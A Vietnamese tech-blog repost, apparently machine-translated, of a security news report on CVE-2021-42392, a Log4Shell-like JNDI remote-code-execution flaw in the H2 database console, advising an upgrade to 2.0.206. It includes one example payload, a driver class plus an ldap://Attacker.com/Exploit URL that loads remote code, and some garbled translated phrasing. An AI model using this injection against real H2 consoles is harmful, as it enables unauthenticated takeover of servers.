CFSDN nhấn mạnh vào giá trị tạo ra nguồn mở và chúng tôi cam kết xây dựng nền tảng chia sẻ tài nguyên để mọi nhân viên CNTT có thể tìm thấy thế giới tuyệt vời của bạn tại đây.
Bài đăng trên blog CFSDN này cảnh báo! Các lỗ hổng Java tương tự như Log4Shell đã xuất hiện và được tác giả sưu tầm, biên soạn. Nếu bạn quan tâm tới bài viết này thì nhớ like nhé.

Các nhà nghiên cứu bảo mật đang cảnh báo về một lỗi Java nghiêm trọng mới có bản chất giống với lỗ hổng Log4Shell khét tiếng hiện đang bị khai thác trên toàn thế giới.
CVE-2021-42392 chưa được công bố chính thức trong Cơ sở dữ liệu dễ bị tổn thương quốc gia (NVD), nhưng theo JFrog trong doanh nghiệp phần mềm, nó ảnh hưởng đến bảng điều khiển của cơ sở dữ liệu H2 Java SQL phổ biến.
Công ty bảo mật nhắc nhở bất kỳ tổ chức nào hiện đang chạy bảng điều khiển H2 tiếp xúc với mạng LAN hoặc WAN của họ phải cập nhật ngay cơ sở dữ liệu của họ lên phiên bản 2.0.206, nếu không nó có thể bị kẻ tấn công khai thác để thực thi mã từ xa không được xác thực (RCE).
Giống như Log4Shell, lỗi này liên quan đến JNDI (Giao diện thư mục và đặt tên Java) "tải lớp từ xa". JNDI là một API cung cấp chức năng đặt tên và thư mục cho các ứng dụng Java. Điều này có nghĩa là nếu kẻ tấn công có thể đưa một URL độc hại vào tra cứu JNDI, thì nó có thể kích hoạt RCE.
"Nói tóm lại, nguyên nhân cốt lõi tương tự như Log4Shell - nhiều đường dẫn mã trong khung cơ sở dữ liệu H2 chuyển các URL do kẻ tấn công kiểm soát chưa được kiểm soát tới hàm javax.naming.Context.lookup, cho phép tải các thư viện mã từ xa (AKA Java Code Tiêm) Thực thi mã từ xa AKA)", JFrog giải thích.
"Cụ thể, phương thức org.h2.util.JdbcUtils.getConnection lấy tên lớp trình điều khiển và URL cơ sở dữ liệu làm tham số. Nếu lớp của trình điều khiển có thể được gán cho lớp javax.naming.Context, thì phương thức này sẽ khởi tạo một đối tượng từ nó và gọi Làm sao tìm được."
Việc cung cấp lớp trình điều khiển như "javax.naming.InitialContext" và một URL đơn giản như ldap://Attacker.com/Exploit sẽ dẫn đến việc thực thi mã từ xa.
JFrog cho biết lỗ hổng này đặc biệt nguy hiểm vì gói cơ sở dữ liệu H2 đặc biệt phổ biến. Công ty tuyên bố rằng đây là một trong 50 gói Maven phổ biến nhất, với gần 7.000 phụ thuộc tạo tác.
Tuy nhiên, có một số lý do khiến việc khai thác sẽ không phổ biến như Log4Shell. Thứ nhất, nó có "phạm vi tiếp cận trực tiếp", nghĩa là các máy chủ dễ bị tấn công sẽ dễ dàng tìm thấy hơn. Thứ hai, trong hầu hết các bản phân phối H2, bảng điều khiển chỉ lắng nghe các kết nối localhost, có nghĩa là cài đặt mặc định không thể khai thác được.
"Nhiều nhà cung cấp có thể đang chạy cơ sở dữ liệu H2 chứ không phải bảng điều khiển H2. Mặc dù có các vectơ khác ngoài bảng điều khiển có thể khai thác vấn đề này, nhưng các vectơ khác này phụ thuộc vào ngữ cảnh và khó có khả năng bị kẻ tấn công từ xa tiếp xúc." JFrog nói thêm.
Liên kết gốc: https://t.cj.sina.com.cn/articles/view/5095232218/12fb312da019012a18.
Bài viết cuối cùng này là về cảnh báo! Đó là bài viết về sự xuất hiện của các lỗ hổng Java tương tự như Log4Shell, nếu bạn muốn biết thêm về các cảnh báo! Để biết thông tin về các lỗ hổng Java tương tự như Log4Shell, vui lòng tìm kiếm các bài viết về CFSDN hoặc tiếp tục duyệt các bài viết liên quan. Tôi hy vọng bạn sẽ ủng hộ blog của tôi trong tương lai! .
Tôi là một lập trình viên xuất sắc, rất giỏi!